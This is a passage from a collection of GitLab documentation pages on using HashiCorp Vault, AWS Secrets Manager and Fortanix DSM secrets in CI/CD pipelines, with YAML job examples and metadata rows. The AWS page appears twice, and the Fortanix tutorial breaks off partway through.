is configured to only allow the policy to be used for the `main` branch in the project with ID `22`: ```shell $ vault write auth/jwt/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims": { "project_id": "22", "ref": "main", "ref_type": "branch" } } EOF ``` And one role for production named `myproject-production`. The `bound_claims` section for this role only allows protected branches that match the `auto-deploy-*` pattern to access the secrets. ```shell $ vault write auth/jwt/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims_type": "glob", "bound_claims": { "project_id": "22", "ref_protected": "true", "ref_type": "branch", "ref": "auto-deploy-*" } } EOF ``` Combined with [protected branches](../../user/project/repository/branches/protected.md), you can restrict who is able to authenticate and read the secrets. Any of the claims [included in the JWT](#hashicorp-vault-secrets-integration) can be matched against a list of values in the bound claims. For example: ```json "bound_claims": { "user_login": ["alice", "bob", "mallory"] } "bound_claims": { "ref": ["main", "develop", "test"] } "bound_claims": { "namespace_id": ["10", "20", "30"] } "bound_claims": { "project_id": ["12", "22", "37"] } ``` - If only `namespace_id` is used, all projects in the namespace are allowed. Nested projects are not included, so their namespace IDs must also be added to the list if needed. - If both `namespace_id` and `project_id` are used, Vault first checks if the project's namespace is in `namespace_id` then checks if the project is in `project_id`. [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl) specifies that the token issued by Vault, upon successful authentication, has a hard lifetime limit of 60 seconds. [`user_claim`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#user_claim) specifies the name for the Identity alias created by Vault upon a successful login. [`bound_claims_type`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims_type) configures the interpretation of the `bound_claims` values. If set to `glob`, the values are interpreted as globs, with `*` matching any number of characters. The claim fields listed in [the previous table](#hashicorp-vault-secrets-integration) can also be accessed for [Vault's policy path templating](https://developer.hashicorp.com/vault/tutorials/policies/policy-templating?in=vault%2Fpolicies) purposes by using the accessor name of the JWT auth in Vault. The [mount accessor name](https://developer.hashicorp.com/vault/tutorials/auth-methods/identity#step-1-create-an-entity-with-alias) (`ACCESSOR_NAME` in the following example) can be retrieved by running `vault auth list`. Policy template example making use of a named metadata field named `project_path`: ```plaintext path "secret/data/{{identity.entity.aliases.ACCESSOR_NAME.metadata.project_path}}/staging/*" { capabilities = [ "read" ] } ``` Role example to support the previous templated policy mapping the claim field, `project_path`, as a metadata field through use of [`claim_mappings`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#claim_mappings) configuration: ```plaintext { "role_type": "jwt", ... "claim_mappings": { "project_path": "project_path" } } ``` For the full list of options, see Vault's [Create Role documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role). {{< alert type="warning" >}} Always restrict your roles to project or namespace by using one of the provided claims (for example, `project_id` or `namespace_id`). Otherwise any JWT generated by this instance may be allowed to authenticate using this role. {{< /alert >}} Now, configure the JWT Authentication method: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` [`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) specifies that only a JWT with the issuer (that is, the `iss` claim) set to `gitlab.example.com` can use this method to authenticate, and that the `oidc_discovery_url` (`https://gitlab.example.com`) should be used to validate the token. For the full list of available configuration options, see Vault's [API documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#configure). In GitLab, create the following [CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, for example `https://vault.example.com:8200`. - `VAULT_AUTH_ROLE` - Optional. Name of the Vault JWT Auth role to use when attempting to authenticate. In this tutorial, we already created two roles with the names `myproject-staging` and `myproject-production`. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured. - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted. Default is `jwt`. - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. If no namespace is specified, Vault uses the root (`/`) namespace. The setting is ignored by Vault Open Source. ### Automatic ID token authentication with Hashicorp Vault The following job, when run for the default branch, can read secrets under `secret/myproject/staging/`, but not the secrets under `secret/myproject/production/`: ```yaml job_with_secrets: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: STAGING_DB_PASSWORD: vault: myproject/staging/db/password@secret # translates to a path of 'secret/myproject/staging/db' and field 'password'. Authenticates using $VAULT_ID_TOKEN. script: - access-staging-db.sh --token $STAGING_DB_PASSWORD ``` In this example: - `id_tokens` - The JSON Web Token (JWT) used for OIDC authentication. The `aud` claim is set to match the `bound_audiences` parameter of the `role` used for the Vault JWT authentication method. - `@secret` - The vault name, where your Secrets Engines are enabled. - `myproject/staging/db` - The path location of the secret in Vault. - `password` The field to be fetched in the referenced secret. If more than one ID token is defined, use the `token` keyword to specify which token should be used. For example: ```yaml job_with_secrets: id_tokens: FIRST_ID_TOKEN: aud: https://first.service.com SECOND_ID_TOKEN: aud: https://second.service.com secrets: FIRST_DB_PASSWORD: vault: first/db/password token: $FIRST_ID_TOKEN SECOND_DB_PASSWORD: vault: second/db/password token: $SECOND_ID_TOKEN script: - access-first-db.sh --token $FIRST_DB_PASSWORD - access-second-db.sh --token $SECOND_DB_PASSWORD ``` ### Manual ID Token authentication You can use ID tokens to authenticate with HashiCorp Vault manually. For example: ```yaml manual_authentication: variables: VAULT_ADDR: http://vault.example.com:8200 image: vault:latest id_tokens: VAULT_ID_TOKEN: aud: http://vault.example.com script: - export VAULT_TOKEN="$(vault write -field=token auth/jwt/login role=myproject-example jwt=$VAULT_ID_TOKEN)" - export PASSWORD="$(vault kv get -field=password secret/myproject/example/db)" - my-authentication-script.sh $VAULT_TOKEN $PASSWORD ``` ### Limit token access to Vault secrets You can control ID token access to Vault secrets by using Vault protections and GitLab features. For example, restrict the token by: - Using Vault [bound audiences](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-audiences) for specific ID token `aud` claims. - Using Vault [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) for specific groups using `group_claim`. - Hard coding values for Vault bound claims based on the `user_login` and `user_email` of specific users. - Setting Vault time limits for TTL of the token as specified in [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl), where the token expires after authentication. - Scoping the JWT to [GitLab protected branches](../../user/project/repository/branches/protected.md) that are restricted to a subset of project users. - Scoping the JWT to [GitLab protected tags](../../user/project/protected_tags.md), that are restricted to a subset of project users. ## Troubleshooting ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access HashiCorp Vault: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because the required variable is not defined: - `VAULT_SERVER_URL` ### `api error: status code 400: missing role` error You might receive a `missing role` error when attempting to start a job configured to access HashiCorp Vault. The error could be because the `VAULT_AUTH_ROLE` variable is not defined, so the job cannot authenticate with the vault server. ### `audience claim does not match any expected audience` error If there is a mismatch between values of `aud:` claim of the ID token specified in the YAML file and the `bound_audiences` parameter of the `role` used for JWT authentication, you can get this error: `invalid audience (aud) claim: audience claim does not match any expected audience` Make sure these values are the same.
https://docs.gitlab.com/ci/aws_secrets_manager
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/aws_secrets_manager.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
aws_secrets_manager.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use AWS Secrets Manager secrets in GitLab CI/CD
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/17822) in GitLab 18.2 [with a flag](../../administration/feature_flags/_index.md) named `ci_aws_secrets_manager`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/553970) in GitLab 18.3. {{< /history >}} You can use secrets stored in [AWS Secrets Manager](https://aws.amazon.com/secrets-manager/) in your GitLab CI/CD pipelines. Prerequisites: - Have access to AWS Secrets Manager in your AWS account. - Configure authentication using one of the following methods: - **IAM Role**: Use the IAM role assigned to your GitLab Runner instance. - **OpenID Connect**: [Configure OpenID Connect in AWS](../cloud_services/aws/_index.md) to retrieve temporary credentials. - Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your AWS configuration: - `AWS_REGION`: The AWS region where your secrets are stored. - `AWS_ROLE_ARN`: The ARN of the AWS IAM role to assume (required when using OpenID Connect). - `AWS_ROLE_SESSION_NAME`: Optional. Custom session name for the assumed role. ## Use AWS Secrets Manager secrets in a CI/CD job ### With IAM Role authentication You can use a secret stored in AWS Secrets Manager in a job by defining it with the `aws_secrets_manager` keyword. This method uses the IAM role assigned to your GitLab Runner instance. Prerequisites: - GitLab Runner 18.3 or later. For example: ```yaml variables: AWS_REGION: us-east-1 database-migration: secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' file: false stage: deploy script: - echo "Running database migration..." - mysql -h $DB_HOST -u $DB_USER -p$DATABASE_PASSWORD < migration.sql - echo "Migration completed successfully." ``` ### With OpenID Connect authentication For enhanced security, you can use OpenID Connect to authenticate with AWS and assume a specific IAM role. By default, the runner looks for an ID token named `AWS_ID_TOKEN`. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role' database-migration: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' file: false stage: deploy script: - echo "Connecting to production database..." - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();" - echo "Database connection successful." ``` You can also specify a custom token using the `token` option. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role' database-migration: id_tokens: CUSTOM_AWS_TOKEN: aud: 'sts.amazonaws.com' secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' token: $CUSTOM_AWS_TOKEN file: false stage: deploy script: - echo "Connecting to production database with custom token..." - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();" - echo "Database connection successful." ``` ### Short form syntax You can use a simplified syntax by specifying the secret ID as a string. You can optionally specify a field by separating it with a `#` character. For example: ```yaml variables: AWS_REGION: us-east-1 api-deployment: secrets: API_KEY: aws_secrets_manager: 'app-secrets/api#api_key' file: false FULL_SECRET: aws_secrets_manager: 'app-secrets/api' file: false stage: deploy script: - echo "Deploying API with specific field..." - curl --header "Authorization: Bearer $API_KEY" https://api.example.com/deploy - echo "Using full secret..." - curl --header "Authorization: Bearer $(cat $FULL_SECRET | jq --raw-output '.api_key')" https://api.example.com/status ``` ## Secret versioning AWS Secrets Manager supports multiple versions of secrets. You can specify a particular version using either `version_id` or `version_stage`. For example: ```yaml variables: AWS_REGION: us-east-1 production-deployment: secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: prod-app-secrets/database field: 'password' version_stage: 'AWSCURRENT' file: false STAGING_DATABASE_PASSWORD: aws_secrets_manager: secret_id: prod-app-secrets/database field: 'password' version_id: '01234567-89ab-cdef-0123-456789abcdef' file: false stage: deploy script: - echo "Deploying to production with current secret version..." - deploy-prod.sh --db-password $DATABASE_PASSWORD - echo "Testing with specific secret version..." - test-with-version.sh --db-password $STAGING_DATABASE_PASSWORD ``` ## Cross-account secret access To retrieve secrets from another AWS account, you must use the full ARN. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/cross-account-secrets-role' cross-account-deployment: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' secrets: SHARED_API_KEY: aws_secrets_manager: secret_id: 'arn:aws:secretsmanager:us-east-1:987654321098:secret:shared-api-keys-AbCdEf' field: 'production_key' file: false stage: deploy script: - echo "Accessing shared secret from another account..." - curl --header "Authorization: Bearer $SHARED_API_KEY" https://shared-api.example.com/deploy ``` ## Per-secret configuration overrides You can override global AWS settings on a per-secret basis. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/default-role' multi-region-deployment: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' EU_AWS_TOKEN: aud: 'sts.amazonaws.com' secrets: EU_DATABASE_PASSWORD: aws_secrets_manager: secret_id: eu-app-secrets/database field: 'password' region: 'eu-west-1' role_arn: 'arn:aws:iam::123456789012:role/eu-deployment-role' role_session_name: 'gitlab-eu-deployment' token: $EU_AWS_TOKEN file: false US_DATABASE_PASSWORD: aws_secrets_manager: secret_id: us-app-secrets/database field: 'password' file: false stage: deploy script: - echo "Deploying to EU region..." - deploy-to-eu.sh --db-password $EU_DATABASE_PASSWORD - echo "Deploying to US region..." - deploy-to-us.sh --db-password $US_DATABASE_PASSWORD ``` In these examples: - `aud`: The audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/aws/_index.md). - `secret_id`: The name or ARN of the secret in AWS Secrets Manager. To retrieve a secret from another account, you must use an ARN. - `field`: Is the specific key in the JSON secret to retrieve. If not specified, the entire secret is retrieved. Field access is only supported for flat JSON secrets (top-level keys only) and supports string, number, and boolean values. For example: - `password`: Accesses the `password` field. - `api_key`: Accesses the `api_key` field. `token`: Specifies which ID token to use for authentication. If not specified, the runner looks for a token named `AWS_ID_TOKEN`. - `version_id`: Is the unique identifier of a specific version of the secret. If you don't specify either `version_id` or `version_stage`, AWS Secrets Manager returns the `AWSCURRENT` version. - `version_stage`: The staging label of the version of the secret to retrieve (such as `AWSCURRENT` or `AWSPENDING`). You cannot specify both `version_id` and `version_stage` for the same secret. - `region`: Overrides the global `AWS_REGION` for this specific secret. - `role_arn`: Overrides the global `AWS_ROLE_ARN` for this specific secret. - `role_session_name`: Overrides the global `AWS_ROLE_SESSION_NAME` for this specific secret. - GitLab fetches the secret from AWS Secrets Manager and stores the value in a temporary file. The path to this file is stored in a CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables). ## Troubleshooting Refer to [OIDC for AWS troubleshooting](../cloud_services/aws/_index.md#troubleshooting) for general problems when setting up OIDC with AWS.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use AWS Secrets Manager secrets in GitLab CI/CD breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/17822) in GitLab 18.2 [with a flag](../../administration/feature_flags/_index.md) named `ci_aws_secrets_manager`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/553970) in GitLab 18.3. {{< /history >}} You can use secrets stored in [AWS Secrets Manager](https://aws.amazon.com/secrets-manager/) in your GitLab CI/CD pipelines. Prerequisites: - Have access to AWS Secrets Manager in your AWS account. - Configure authentication using one of the following methods: - **IAM Role**: Use the IAM role assigned to your GitLab Runner instance. - **OpenID Connect**: [Configure OpenID Connect in AWS](../cloud_services/aws/_index.md) to retrieve temporary credentials. - Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your AWS configuration: - `AWS_REGION`: The AWS region where your secrets are stored. - `AWS_ROLE_ARN`: The ARN of the AWS IAM role to assume (required when using OpenID Connect). - `AWS_ROLE_SESSION_NAME`: Optional. Custom session name for the assumed role. ## Use AWS Secrets Manager secrets in a CI/CD job ### With IAM Role authentication You can use a secret stored in AWS Secrets Manager in a job by defining it with the `aws_secrets_manager` keyword. This method uses the IAM role assigned to your GitLab Runner instance. Prerequisites: - GitLab Runner 18.3 or later. For example: ```yaml variables: AWS_REGION: us-east-1 database-migration: secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' file: false stage: deploy script: - echo "Running database migration..." - mysql -h $DB_HOST -u $DB_USER -p$DATABASE_PASSWORD < migration.sql - echo "Migration completed successfully." ``` ### With OpenID Connect authentication For enhanced security, you can use OpenID Connect to authenticate with AWS and assume a specific IAM role. By default, the runner looks for an ID token named `AWS_ID_TOKEN`. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role' database-migration: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' file: false stage: deploy script: - echo "Connecting to production database..." - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();" - echo "Database connection successful." ``` You can also specify a custom token using the `token` option. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role' database-migration: id_tokens: CUSTOM_AWS_TOKEN: aud: 'sts.amazonaws.com' secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: app-secrets/database field: 'password' token: $CUSTOM_AWS_TOKEN file: false stage: deploy script: - echo "Connecting to production database with custom token..." - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();" - echo "Database connection successful." ``` ### Short form syntax You can use a simplified syntax by specifying the secret ID as a string. You can optionally specify a field by separating it with a `#` character. For example: ```yaml variables: AWS_REGION: us-east-1 api-deployment: secrets: API_KEY: aws_secrets_manager: 'app-secrets/api#api_key' file: false FULL_SECRET: aws_secrets_manager: 'app-secrets/api' file: false stage: deploy script: - echo "Deploying API with specific field..." - curl --header "Authorization: Bearer $API_KEY" https://api.example.com/deploy - echo "Using full secret..." - curl --header "Authorization: Bearer $(cat $FULL_SECRET | jq --raw-output '.api_key')" https://api.example.com/status ``` ## Secret versioning AWS Secrets Manager supports multiple versions of secrets. You can specify a particular version using either `version_id` or `version_stage`. For example: ```yaml variables: AWS_REGION: us-east-1 production-deployment: secrets: DATABASE_PASSWORD: aws_secrets_manager: secret_id: prod-app-secrets/database field: 'password' version_stage: 'AWSCURRENT' file: false STAGING_DATABASE_PASSWORD: aws_secrets_manager: secret_id: prod-app-secrets/database field: 'password' version_id: '01234567-89ab-cdef-0123-456789abcdef' file: false stage: deploy script: - echo "Deploying to production with current secret version..." - deploy-prod.sh --db-password $DATABASE_PASSWORD - echo "Testing with specific secret version..." - test-with-version.sh --db-password $STAGING_DATABASE_PASSWORD ``` ## Cross-account secret access To retrieve secrets from another AWS account, you must use the full ARN. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/cross-account-secrets-role' cross-account-deployment: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' secrets: SHARED_API_KEY: aws_secrets_manager: secret_id: 'arn:aws:secretsmanager:us-east-1:987654321098:secret:shared-api-keys-AbCdEf' field: 'production_key' file: false stage: deploy script: - echo "Accessing shared secret from another account..." - curl --header "Authorization: Bearer $SHARED_API_KEY" https://shared-api.example.com/deploy ``` ## Per-secret configuration overrides You can override global AWS settings on a per-secret basis. For example: ```yaml variables: AWS_REGION: us-east-1 AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/default-role' multi-region-deployment: id_tokens: AWS_ID_TOKEN: aud: 'sts.amazonaws.com' EU_AWS_TOKEN: aud: 'sts.amazonaws.com' secrets: EU_DATABASE_PASSWORD: aws_secrets_manager: secret_id: eu-app-secrets/database field: 'password' region: 'eu-west-1' role_arn: 'arn:aws:iam::123456789012:role/eu-deployment-role' role_session_name: 'gitlab-eu-deployment' token: $EU_AWS_TOKEN file: false US_DATABASE_PASSWORD: aws_secrets_manager: secret_id: us-app-secrets/database field: 'password' file: false stage: deploy script: - echo "Deploying to EU region..." - deploy-to-eu.sh --db-password $EU_DATABASE_PASSWORD - echo "Deploying to US region..." - deploy-to-us.sh --db-password $US_DATABASE_PASSWORD ``` In these examples: - `aud`: The audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/aws/_index.md). - `secret_id`: The name or ARN of the secret in AWS Secrets Manager. To retrieve a secret from another account, you must use an ARN. - `field`: Is the specific key in the JSON secret to retrieve. If not specified, the entire secret is retrieved. Field access is only supported for flat JSON secrets (top-level keys only) and supports string, number, and boolean values. For example: - `password`: Accesses the `password` field. - `api_key`: Accesses the `api_key` field. `token`: Specifies which ID token to use for authentication. If not specified, the runner looks for a token named `AWS_ID_TOKEN`. - `version_id`: Is the unique identifier of a specific version of the secret. If you don't specify either `version_id` or `version_stage`, AWS Secrets Manager returns the `AWSCURRENT` version. - `version_stage`: The staging label of the version of the secret to retrieve (such as `AWSCURRENT` or `AWSPENDING`). You cannot specify both `version_id` and `version_stage` for the same secret. - `region`: Overrides the global `AWS_REGION` for this specific secret. - `role_arn`: Overrides the global `AWS_ROLE_ARN` for this specific secret. - `role_session_name`: Overrides the global `AWS_ROLE_SESSION_NAME` for this specific secret. - GitLab fetches the secret from AWS Secrets Manager and stores the value in a temporary file. The path to this file is stored in a CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables). ## Troubleshooting Refer to [OIDC for AWS troubleshooting](../cloud_services/aws/_index.md#troubleshooting) for general problems when setting up OIDC with AWS.
https://docs.gitlab.com/ci/fortanix_dsm_integration
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/fortanix_dsm_integration.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
fortanix_dsm_integration.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Use Fortanix Data Security Manager (DSM) with GitLab
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can use Fortanix Data Security Manager (DSM) as your secrets manager for GitLab CI/CD pipelines. This tutorial explains the steps required to generate new secrets in Fortanix DSM, or use existing secrets, and use them in GitLab CI/CD jobs. Follow the instructions carefully, to implement this integration, enhancing data security and optimizing your CI/CD pipelines. ## Before you begin Ensure that you have: - Access to a Fortanix DSM account with appropriate administrative privileges. For more information, refer to [Getting Started with Fortanix Data Security Manager](https://www.fortanix.com/start-your-free-trial). - A [GitLab account](https://gitlab.com/users/sign_up) with access to the project where you intend to set up the integration. - Knowledge about the process of saving secrets in Fortanix DSM, including generating and importing secrets. - Access to necessary permissions in Fortanix DSM and GitLab for group, application, plugin, variable, and secret management. ## Generate and import a new secret To generate a new secret in Fortanix DSM and use it with GitLab: 1. Sign in to your Fortanix DSM account. 1. In Fortanix DSM, [create a new group and an application](https://support.fortanix.com/hc/en-us/articles/360015809372-User-s-Guide-Getting-Started-with-Fortanix-Data-Security-Manager-UI). 1. Configure the [API Key as the authentication method for the application](https://support.fortanix.com/hc/en-us/articles/360033272171-User-s-Guide-Authentication). 1. Use the following code to generate a new plugin in Fortanix DSM: ```lua numericAlphabet = "0123456789" alphanumericAlphabet = numericAlphabet .. "abcdefghijklmnopqrstuvwxyz" alphanumericCapsAlphabet = alphanumericAlphabet .. "ABCDEFGHIJKLMNOPQRSTUVWXYZ" alphanumericCapsSymbolsAlphabets = alphanumericCapsAlphabet .. "!@#$&*_%=" function genPass(alphabet, len, name, import) local alphabetSize = #alphabet local password = '' for i = 1, len, 1 do local random_char = math.random(alphabetSize) password = password .. string.sub(alphabet, random_char, random_char) end local pass = Blob.from_bytes(password) if import == "yes" then local sobject = assert(Sobject.import { name = name, obj_type = "SECRET", value = pass, key_ops = {'APPMANAGEABLE', 'EXPORT'} }) return password end return password; end function run(input) if input.type == "numeric" then return genPass(numericAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric" then return genPass(alphanumericAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric_caps" then return genPass(alphanumericCapsAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric_caps_symbols" then return genPass(alphanumericCapsSymbolsAlphabets, input.length, input.name, input.import) end end ``` For more information, see the [Fortanix user's Guide: Plugin Library](https://support.fortanix.com/hc/en-us/articles/360041950371-User-s-Guide-Plugin-Library). - Set the import option to `yes` if you want to store the secret in Fortanix DSM: ```json { "type": "alphanumeric_caps", "length": 64, "name": "GitLab-Secret", "import": "yes" } ``` - Set the import option to `no` if you only want a new value generated for rotation: ```json { "type": "numeric", "length": 64, "name": "GitLab-Secret", "import": "no" } ``` 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_PLUGIN_ID` 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update - apt install --assume-yes jq - apt install --assume-yes curl - jq --version - curl --version - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"name\":\"$CI_PIPELINE_ID\",\"import\":\"yes\", \"length\":\"48\"}" | jq --raw-output) - nsecret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"import\":\"no\", \"length\":\"48\"}" | jq --raw-output) - encodesecret=$(echo $nsecret | base64) - rotate=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/rekey --data "{\"name\":\"$CI_PIPELINE_ID\", \"value\":\"$encodesecret\"}" | jq --raw-output .kid) ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. Go to **Build > Jobs** and check the `build` job's log: ![gitlab_build_result_1](img/gitlab_build_result_1_v16_9.png) ![dsm_secrets](img/dsm_secrets_v16_9.png) ## Use an existing secret from Fortanix DSM To use a secret that already exists in Fortanix DSM with GitLab: 1. The secret must be marked as exportable in Fortanix: ![dsm_secret_import_1](img/dsm_secret_import_1_v16_9.png) 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_PLUGIN_ID` 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update - apt install --assume-yes jq - apt install --assume-yes curl - jq --version - curl --version - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME}\"}" | jq --raw-output .value) ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. Go to **Build > Jobs** and check the `build` job's log: - ![gitlab_build_result_2](img/gitlab_build_result_2_v16_9.png) ## Code Signing To set up code signing securely in your GitLab environment: 1. Sign in to your Fortanix DSM account. 1. Import `keystore_password` and `key_password` as secrets in Fortanix DSM. Ensure that they are marked as exportable. ![dsm_secret_import_2](img/dsm_secret_import_2_v16_9.png) 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_SECRET_NAME_1` (for `keystore_password`) - `FORTANIX_SECRET_NAME_2` (for `key_password`) 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update -qy - apt install --assume-yes jq - apt install --assume-yes curl - apt-get install wget - apt-get install unzip - apt-get install --assume-yes openjdk-8-jre-headless openjdk-8-jdk # Install Java - keystore_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_1}\"}" | jq --raw-output .value) - key_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_2}\"}" | jq --raw-output .value) - echo "yes" | keytool -genkeypair -alias mykey -keyalg RSA -keysize 2048 -keystore keystore.jks -storepass $keystore_password -keypass $key_password -dname "CN=test" - mkdir -p src/main/java - echo 'public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World!"); } }' > src/main/java/HelloWorld.java - javac src/main/java/HelloWorld.java - mkdir -p target - jar cfe target/HelloWorld.jar HelloWorld -C src/main/java HelloWorld.class - jarsigner -keystore keystore.jks -storepass $keystore_password -keypass $key_password -signedjar signed.jar target/HelloWorld.jar mykey ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. 